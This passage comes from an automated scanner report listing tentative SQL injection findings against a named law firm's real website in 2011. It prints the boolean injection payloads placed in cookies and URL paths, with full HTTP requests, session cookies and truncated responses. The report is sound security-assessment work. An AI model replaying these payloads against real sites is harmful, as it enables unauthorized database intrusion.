<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.75. http://www.pillsburylaw.com/index.cfm [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 15781207'%20or%201%3d1--%20 and 15781207'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee515781207'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:45:45 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee515781207'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.76. http://www.pillsburylaw.com/index.cfm [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 18340356'%20or%201%3d1--%20 and 18340356'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee518340356'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:45:37 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee518340356'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.77. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/general.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18146897'%20or%201%3d1--%20 and 18146897'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts18146897'%20or%201%3d1--%20/general.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts18146897'%20or%201%3d2--%20/general.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:14:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.78. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/general.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 41613986'%20or%201%3d1--%20 and 41613986'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/general.css41613986'%20or%201%3d1--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:14:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/general.css41613986'%20or%201%3d2--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:14:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.79. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 92255674%20or%201%3d1--%20 and 92255674%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
